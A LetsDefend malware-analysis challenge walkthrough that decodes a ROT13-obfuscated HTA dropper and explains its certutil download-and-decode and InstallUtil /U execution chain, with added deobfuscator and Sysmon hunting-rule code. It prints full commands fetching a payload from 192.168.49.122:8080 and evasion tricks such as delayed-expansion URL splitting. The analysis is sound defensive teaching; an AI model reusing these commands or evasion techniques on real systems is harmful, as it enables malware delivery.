Obfuscated HTA
Let's Defend Malware Analysis [Easy]


#tutorial

Challenge Description

image

Solution and Analysis

First, unzip the password-protected archive to get the .HTA file and open it in Notepad++. Do this inside an isolated analysis VM and open the file only in a text editor: double-clicking an .hta hands it to mshta.exe, which runs the script.

Question 1: What is the deobfuscated result of the sample in str1?

To answer this, open the file in Notepad++ and look at line 14:

image

However, the value is ROT13-encoded (a fixed letter substitution, not encryption), so any ROT13 decoder recovers it. I used CyberChef and got this result:

image

This is the answer to the question.

Question 2: After deobfuscating the sample in str2, what is the resulting output?

To answer this, go to line 45, where the sample's value is stored in str2, as shown below:

image

It is also ROT13-encoded; decode it with the same tool you used previously:

image

That is the answer.

Question 3: What is the deobfuscated result of sample in str3?

Decode the value in str3 with ROT13, as for the previous ones, to get the answer:

image

Question 4: What does the sample in str4 translate to after deobfuscation?

Decode it the same way; it is ROT13 as well:

image

Question 5: What is the deobfuscated result of sample in str5?

Same method as the previous ones:

image

Question 6: What is the deobfuscated value of the "wobj" variable?

Same logic: decode it with ROT13:

image

Question 7: What is the purpose of the cmd variable in the script?

This is the cmd variable:

cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";

Substitute the decoded values of str3, str1 and str2 to assemble the full command. The purpose of cmd is to build the download command in a way that keeps the URL split: the /v switch turns on delayed environment variable expansion, so !t! is replaced with the value of t (http://) only when cmd.exe runs the line, and the scheme and the host never appear together anywhere in the file:

%comspec% /v /c "set t=http://&&certutil.exe -urlcache -split -f!t!192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt"
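The same decode-and-assemble work in code, as an added example that is not part of the challenge file or this walkthrough. It implements the ROT13 that scram() performs, pulls every scram("...") assignment out of the script text, rebuilds cmd exactly as the concatenation above does, and then emulates what cmd.exe /v does with !t!, which is the point made again in the Stage 1 analysis further down. SAMPLE_HTA is constructed: the encoded literals were produced by ROT13-encoding the commands this walkthrough recovers, and a trailing space in str1 is assumed so the URL becomes a separate certutil argument.

```javascript
// Added example, not code from the challenge file: a static deobfuscator for
// the ROT13-wrapped HTA pattern this walkthrough describes. It pulls every
// scram("...") assignment out of the script text, decodes it, rebuilds cmd the
// way the script concatenates it, and emulates the /v delayed expansion of !t!.
// SAMPLE_HTA is CONSTRUCTED: the encoded literals were made by ROT13-encoding
// the commands listed in the walkthrough, and a trailing space in str1 is
// assumed so that the URL ends up as a separate certutil argument.
const SAMPLE_HTA = String.raw`
<script language="JScript">
var str1 = scram("preghgvy.rkr -heypnpur -fcyvg -s ");
var str2 = scram("192.168.49.122:8080/svyr.gkg P:\\Jvaqbjf\\Gnfxf\\svyr.gkg");
var str3 = scram("uggc://");
var str4 = scram("preghgvy -qrpbqr P:\\Jvaqbjf\\Gnfxf\\svyr.gkg P:\\Jvaqbjf\\Gnfxf\\oc.rkr");
var str5 = scram("P:\\Jvaqbjf\\Zvpebfbsg.ARG\\Senzrjbex64\\i4.0.30319\\VafgnyyHgvy.rkr /ybtsvyr= /YbtGbPbafbyr=snyfr /H P:\\Jvaqbjf\\Gnfxf\\oc.rkr");
var wobj = scram("Jfpevcg.furyy");
var cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";
</script>
`;

// ROT13 is its own inverse, so one routine both encodes and decodes; this is
// all the sample's scram() does.
function rot13(s) {
  return s.replace(/[A-Za-z]/g, (c) => {
    const base = c <= "Z" ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// Undo the two JScript string escapes a path literal needs: \\ and \".
function unescapeJs(literal) {
  return literal.replace(/\\(["\\])/g, "$1");
}

// Collect every `var NAME = scram("...")` and return { NAME: decoded }.
function extractScramStrings(src) {
  const re = /var\s+(\w+)\s*=\s*scram\("((?:[^"\\]|\\.)*)"\)/g;
  const out = {};
  let m;
  while ((m = re.exec(src)) !== null) {
    out[m[1]] = rot13(unescapeJs(m[2]));
  }
  return out;
}

// Rebuild cmd exactly as the script's concatenation does.
function buildCmd(v) {
  return '%comspec% /v /c "set t=' + v.str3 + "&&" + v.str1 + "!t!" + v.str2 + '"';
}

// Emulate cmd.exe /v /c: `set t=...` assigns t, then !t! is substituted at run
// time, so the scheme and host only meet in memory, never in the file.
function expandDelayed(cmdLine) {
  const body = cmdLine.replace(/^%comspec% \/v \/c "(.*)"$/, "$1");
  const parts = body.split("&&");
  const vars = {};
  const setMatch = parts[0].match(/^set (\w+)=(.*)$/);
  if (setMatch) vars[setMatch[1]] = setMatch[2];
  return parts
    .slice(1)
    .join("&&")
    .replace(/!(\w+)!/g, (whole, name) => (name in vars ? vars[name] : whole));
}

function deobfuscate(src) {
  const strings = extractScramStrings(src);
  const cmd = buildCmd(strings);
  return { strings, cmd, effective: expandDelayed(cmd) };
}

const result = deobfuscate(SAMPLE_HTA);
for (const [name, value] of Object.entries(result.strings)) {
  console.log(name.padEnd(9) + "= " + value);
}
console.log("cmd      = " + result.cmd);
console.log("effective= " + result.effective);
```

Run it with node; it prints the six decoded strings, the assembled cmd with !t! still unexpanded, and the effective certutil line. Note that a plain grep for "http://192.168" over either the file or the assembled cmd finds nothing: only the emulated expansion produces the contiguous URL, which is why the walkthrough treats the split as an evasion.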

Question 8: What is the second command executed by the "ActiveXObject"?

This is the value stored in the str4 variable (the certutil -decode command, run by ex.Run(cmd2)).

What does the malware do?

This HTA file is a multi-stage malware dropper. Its primary function is to download a malicious payload from a remote server, decode it, and execute it on the victim's machine. It employs several common obfuscation and defense evasion techniques to avoid detection by security software. The entire attack is automated and occurs silently in the background once the HTA file is opened.

Core Techniques: Obfuscation and Execution

The script relies on two fundamental components to achieve its goal.

1. Obfuscation

The script's main defense is hiding its true intent.

  • ROT13 Cipher: All critical strings—commands, file paths, and URLs—are encoded using a simple ROT13 cipher. They are never stored in plain text.
  • Runtime Deobfuscation: The scram() function is the ROT13 decoder. It turns the encoded strings into executable commands only while the script runs, which defeats naive static scans that look for keywords such as certutil in the file; a scanner that ROT13-decodes or emulates the script still sees them.

2. Execution Engine

The script uses a legitimate Windows component to interact with the operating system.

  • ActiveXObject("Wscript.shell"): The deobfuscated wobj variable creates an instance of the Windows Script Host Shell. This powerful object allows the JScript code to run system commands with the same privileges as the user, effectively bridging the gap between the HTA script and the underlying OS.

The Three-Stage Attack Chain

The script executes a sequence of three distinct commands, as laid out in the code's comments and structure.

Stage 1: Delivery – Downloading the Payload

This stage is initiated by the first ex.Run(cmd) call and fetches the payload from an attacker-controlled staging server at 192.168.49.122:8080.

  • Assembled Command (cmd):
    %comspec% /v /c "set t=http://&& certutil.exe -urlcache -split -f !t!192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt"
    
  • Execution Analysis:
    1. The command first sets a temporary environment variable t to http://. Because cmd.exe was started with /v (delayed environment variable expansion), !t! is substituted only when the line executes, so the full URL never exists in the file or in the cmd string; it is an evasion against string-based scanning.
    2. It then uses certutil.exe, a legitimate Windows utility, to download a file. This is a "Living Off the Land" (LOLBin) technique.
    3. The final, effective command executed is:
      certutil.exe -urlcache -split -f http://192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt
      
  • Outcome: An encoded payload named file.txt is downloaded and saved to C:\Windows\Tasks\. Because -urlcache goes through the CryptoAPI URL cache, a copy of the download also lands under %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache, which is worth collecting during incident response even if C:\Windows\Tasks\ has been cleaned.

Stage 2: Setup – Decoding the Payload

This stage, executed by ex.Run(cmd2), prepares the downloaded file for execution.

  • Deobfuscated Command (str4):
    certutil -decode C:\Windows\Tasks\file.txt C:\Windows\Tasks\bp.exe
    
  • Execution Analysis: The script once again uses certutil.exe. The -decode flag expects Base64 input (it also accepts the -----BEGIN/END CERTIFICATE----- header lines that certutil -encode emits) and writes the decoded binary content to a new file, so file.txt is a Base64-encoded PE.
  • Outcome: The encoded file.txt is decoded into a malicious executable file named bp.exe.

Stage 3: Execution – Running the Malware

This is the final stage, executed by ex.Run(cmd3), which runs the malicious payload.

  • Deobfuscated Command (str5):
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bp.exe
    
  • Execution Analysis: Instead of running bp.exe directly, the attacker uses another LOLBin, InstallUtil.exe, a signed .NET Framework utility (MITRE ATT&CK T1218.004). The /U switch tells InstallUtil to run the Uninstall method of any class in the target assembly that derives from System.Configuration.Install.Installer; the attacker places the payload in that method, so bp.exe must be a .NET assembly built for this purpose, and its code runs inside a Microsoft-signed process rather than as a new, unsigned one, which is what defeats application whitelisting and some antivirus heuristics. /logfile= with an empty value and /LogToConsole=false suppress the install log and console output.
  • Outcome: The malicious payload bp.exe is executed on the system.

Conclusion: End-to-End Attack Flow

From the moment the user opens the HTA file, the following occurs silently:

  1. The script decodes a series of hidden commands.
  2. It downloads an encoded file (file.txt) using certutil.exe.
  3. It decodes the file into an executable (bp.exe), again using certutil.exe.
  4. It executes the malware using a trusted system utility (InstallUtil.exe) to evade detection.
  5. The HTA window closes itself (self.close()) to remove any visual indicator that it was ever run.
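The flow above also reads as a hunting checklist. The following is an added example, not part of the walkthrough: each step of the chain is expressed as a rule over process-creation events and run against constructed events that mirror the commands recovered here. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine) and must be adapted to your EDR's schema; the parent/child relationships (mshta.exe spawning cmd.exe, certutil.exe and InstallUtil.exe via WScript.Shell Run) are an assumption about how those calls spawn children, not something taken from the sample.

```javascript
// Added example, not part of the walkthrough: a hunting check for the chain
// described above, run over CONSTRUCTED process-creation events. Field names
// follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); adapt them to
// your EDR's schema. The events mirror the commands the walkthrough recovered;
// the parent/child relationships are an assumption about how WScript.Shell
// Run() and %comspec% spawn their children, not taken from the sample.
const EVENTS = [
  { ParentImage: "C:\\Windows\\explorer.exe",
    Image: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: "\"C:\\Windows\\System32\\mshta.exe\" C:\\Users\\victim\\Downloads\\invoice.hta" },
  { ParentImage: "C:\\Windows\\System32\\mshta.exe",
    Image: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: "C:\\Windows\\system32\\cmd.exe /v /c \"set t=http://&&certutil.exe -urlcache -split -f !t!192.168.49.122:8080/file.txt C:\\Windows\\Tasks\\file.txt\"" },
  { ParentImage: "C:\\Windows\\System32\\cmd.exe",
    Image: "C:\\Windows\\System32\\certutil.exe",
    CommandLine: "certutil.exe -urlcache -split -f http://192.168.49.122:8080/file.txt C:\\Windows\\Tasks\\file.txt" },
  { ParentImage: "C:\\Windows\\System32\\mshta.exe",
    Image: "C:\\Windows\\System32\\certutil.exe",
    CommandLine: "certutil -decode C:\\Windows\\Tasks\\file.txt C:\\Windows\\Tasks\\bp.exe" },
  { ParentImage: "C:\\Windows\\System32\\mshta.exe",
    Image: "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe",
    CommandLine: "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\bp.exe" },
  // Benign noise: an admin inspecting a certificate must not fire anything.
  { ParentImage: "C:\\Windows\\System32\\cmd.exe",
    Image: "C:\\Windows\\System32\\certutil.exe",
    CommandLine: "certutil -dump C:\\certs\\corp-root.cer" },
];

// One rule per stage of the chain, each matching on image plus command line.
const RULES = [
  { name: "certutil download (-urlcache -split -f)",
    match: (e) => /certutil\.exe$/i.test(e.Image) && /-urlcache/i.test(e.CommandLine) && /-split/i.test(e.CommandLine) },
  { name: "certutil -decode writing an executable",
    match: (e) => /certutil\.exe$/i.test(e.Image) && /-decode/i.test(e.CommandLine) && /\.(exe|dll|scr)\b/i.test(e.CommandLine) },
  { name: "InstallUtil /U proxy execution (T1218.004)",
    match: (e) => /InstallUtil\.exe$/i.test(e.Image) && /\s\/u\b/i.test(e.CommandLine) },
  { name: "mshta spawning a LOLBin or shell",
    match: (e) => /mshta\.exe$/i.test(e.ParentImage) && /(cmd|certutil|InstallUtil)\.exe$/i.test(e.Image) },
  { name: "cmd /v with delayed-expansion variable (split URL)",
    match: (e) => /cmd\.exe$/i.test(e.Image) && /\s\/v\b/i.test(e.CommandLine) && /!\w+!/.test(e.CommandLine) },
];

// Return one hit per (event, rule) pair so the chain can be reconstructed.
function evaluate(events) {
  const hits = [];
  events.forEach((e, index) => {
    for (const rule of RULES) {
      if (rule.match(e)) hits.push({ index, rule: rule.name, image: e.Image });
    }
  });
  return hits;
}

// Collapse hits into the distinct stages seen, in order of first appearance.
function stagesSeen(events) {
  const seen = [];
  for (const h of evaluate(events)) if (!seen.includes(h.rule)) seen.push(h.rule);
  return seen;
}

for (const h of evaluate(EVENTS)) console.log(`event ${h.index}: ${h.rule} <- ${h.image}`);
```

The mshta launch itself is deliberately not a rule: mshta.exe has legitimate uses, so the signal is mshta as the parent of cmd.exe, certutil.exe or InstallUtil.exe, and any one of those children together with a certutil -urlcache or -decode, or an InstallUtil /U, is enough to open a case. The benign certutil -dump event shows the command-line qualifiers keeping the certutil rules from firing on routine administration.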